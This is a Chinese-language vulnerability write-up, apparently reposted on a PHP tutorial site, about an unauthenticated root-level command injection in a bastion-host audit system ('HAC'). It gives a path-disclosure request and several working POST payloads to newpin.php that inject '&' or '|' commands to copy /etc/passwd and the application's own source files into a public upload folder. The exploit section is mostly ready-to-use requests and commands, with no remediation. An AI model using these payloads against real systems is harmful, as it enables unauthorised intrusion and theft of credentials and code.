来源:自学PHP网 时间:2015-04-15 15:00 作者: 阅读:次
[导读] 先说:非struts2。root权限,好爽的。不用登录,更爽的!HAC的登录界面截图如下:运维审计系统到底有多重要,就不用提了吧?有了这台服务器到底会有多少东西沦陷,这就不必说了。以...
先说:非struts2。root权限,好爽的。不用登录,更爽的!
以下的测试都是在内网进行的 先说个暴路径的。 post提交以下数据 https://10.100.113.11/login.php password_check=1&account=1&password=1&usb_code=&certcn[]=&randvalue=1366349330¬ifypwd= 其实就是certcn[]做了点处理,然后就暴了路径:
好几个参数只要在前后附加上&或者|就可以直接执行命令,比如我post以下数据: https://1.1.1.1/newpin.php username=1%26cp+%2Fetc%2Fpasswd+%2Fusr%2Flocal%2Fapache2%2Fhtdocs%2Fproject%2Fwww%2Fupload%2F1.txt+%26&tokencode=1&pincode=1&pincodes=1&msg=
1 | uname -a > /usr/local/apache2/htdocs/project/www/upload/12.txt
ls -al > /usr/local/apache2/htdocs/project/www/upload/12.txt
1&cp /usr/local/apache2/htdocs/project/www/newpin.php /usr/local/apache2/htdocs/project/www/upload/11.txt &
虽然我PHP很弱,但是一看就有命令注入啊………………
再看看首页源码: 1&cp /usr/local/apache2/htdocs/project/www/login.php /usr/local/apache2/htdocs/project/www/upload/11.txt &
<?php require_once('include.php'); require_once './admin/SystemDB.php'; admin/SystemDB.php可能是和数据库有关的。
源码都在这了,截图一个:
|
自学PHP网专注网站建设学习,PHP程序学习,平面设计学习,以及操作系统学习
京ICP备14009008号-1@版权所有www.zixuephp.com
网站声明:本站所有视频,教程都由网友上传,站长收集和分享给大家学习使用,如由牵扯版权问题请联系站长邮箱904561283@qq.com